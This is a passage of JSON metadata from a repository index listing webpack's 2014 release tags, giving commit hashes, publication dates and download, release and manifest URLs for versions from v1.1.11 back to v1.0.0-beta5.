k/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","ta